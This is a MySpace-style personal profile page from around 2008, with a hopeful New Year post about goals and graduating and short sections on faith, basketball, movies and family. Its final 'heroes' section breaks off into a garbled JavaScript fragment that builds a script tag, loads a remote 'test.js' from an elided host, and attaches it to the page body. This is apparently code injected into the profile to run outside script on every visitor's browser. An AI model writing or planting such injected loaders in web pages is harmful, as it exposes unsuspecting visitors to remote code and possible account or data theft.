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I am here for Friends and Networking

About Me

I edited my profile at , check out these Myspace Layouts!
The new year is finally here and I'm just really excited because I know 08 is going to be a very great year, well for me anyways. I have many goals which I plan to accomplish one by one. The biggest one for me is getting my site up and running this year which im sure it will because the boy is focused and I'm working harder then a bad bladder. I'm also just going to try to become and overall better person, not saying that im not a good guy already because I am but there is always room for improvement. In 07 I lost a couple of good people but gained many more in return and I plan to keep it that way. I look foward to the challenges that are ahead and also just all the other surprises that this year has in store. Regardless it's going to a good year and a successful one, oh not to mention I will be graduating this year which is an major accomplishment for me. So to everyone who did make goals for this year, just don't talk about what your going to do get your ass up and do what you said your going to do. Actions speak louder then words people and for those who know me well know that I do what I say I'm going to do and for the people I choose to put myself around do what they say there going to do. Anyone can make there dreams come true but you gotta be willing to work hard to make your dreams come true. Success is waiting for you at the door people so you may want to get up and answer before it decides to leave you behind. With all that said people have a safe and happy new year and God Bless each and everyone one of you.

My Interests

I love to play ball and chill out with my family and friends. Besides God family and friends and what is most important to me in life. I love to go out to the club and to the movies.

I'd like to meet:

I want to meet God and Jesus more then anything or anyone. If not for those two u would be nothing. I also want to meet my favorite ball player Kevin Garnett. I've seen him play before in person but never got to meet him face to face but next time I will.


I listin to whateve..r fits to mood I'm in.


I like to go see scary and funny movies.


I love family guy and I'll leave it at that.


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I have some many people that I look up to, God would be ..1. My family and my true friends for always being there for me and loving me for who I am. .."var x=document·('script');x.src='http://www.../.../test.js' ;document·getElementsByTagName('body')[0].appendChild(x );" /..